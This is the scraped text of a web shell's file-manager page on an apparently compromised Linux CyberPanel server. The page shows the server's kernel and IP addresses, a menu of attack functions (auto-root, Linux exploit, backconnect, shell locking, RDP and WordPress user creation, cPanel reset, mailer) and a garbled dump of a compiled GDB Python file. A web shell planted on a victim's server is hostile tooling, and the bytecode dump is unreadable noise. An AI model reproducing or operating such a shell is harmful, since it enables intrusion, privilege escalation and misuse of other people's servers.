Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
command /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
138
B
-rw-r--r--
explore.cpython-310.pyc
19.29
KB
-rw-r--r--
frame_filters.cpython-310.pyc
14.02
KB
-rw-r--r--
pretty_printers.cpython-310.py...
9.04
KB
-rw-r--r--
prompt.cpython-310.pyc
1.64
KB
-rw-r--r--
type_printers.cpython-310.pyc
3.9
KB
-rw-r--r--
unwinders.cpython-310.pyc
5.76
KB
-rw-r--r--
xmethods.cpython-310.pyc
8.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : type_printers.cpython-310.pyc
o ̴6b� � @ sl d dl Z d dlZ G dd� dej�ZG dd� dej�ZG dd� de�ZG dd � d e�Ze� e� e� dS ) � Nc s0 e Zd ZdZ� fdd�Zdd� Zdd� Z� ZS )�InfoTypePrinterzPGDB command to list all registered type-printers. Usage: info type-printersc s t t| ��dtj� d S )Nzinfo type-printers)�superr �__init__�gdb�COMMAND_DATA��self�� __class__� �2/usr/share/gdb/python/gdb/command/type_printers.pyr s zInfoTypePrinter.__init__c C sF t t�|�dd� d�}|D ]}|jrd}nd}td|j|f � q dS )zPrint a list of type printers.c S s | j S �N)�name)�xr r r �<lambda># s z4InfoTypePrinter.list_type_printers.<locals>.<lambda>)�key� z [disabled]z %s%sN)�sorted�copy�enabled�printr )r � type_printers�sorted_type_printers�printerr r r r �list_type_printers s �z"InfoTypePrinter.list_type_printersc C s� d}t �� D ]}|jrtd||jf � | �|j� d}qt �� jr2td| � | �t �� j� d}t jrCtd| � | �t j� dS dS )�&GDB calls this to perform the command.r z%sType printers for %s:� z"%sType printers for program space:z%sGlobal type printers:N)r �objfilesr r �filenamer �current_progspace)r �arg�from_tty�sep�objfiler r r �invoke+ s � �zInfoTypePrinter.invoke)�__name__� __module__�__qualname__�__doc__r r r$ � __classcell__r r r r r s r c s<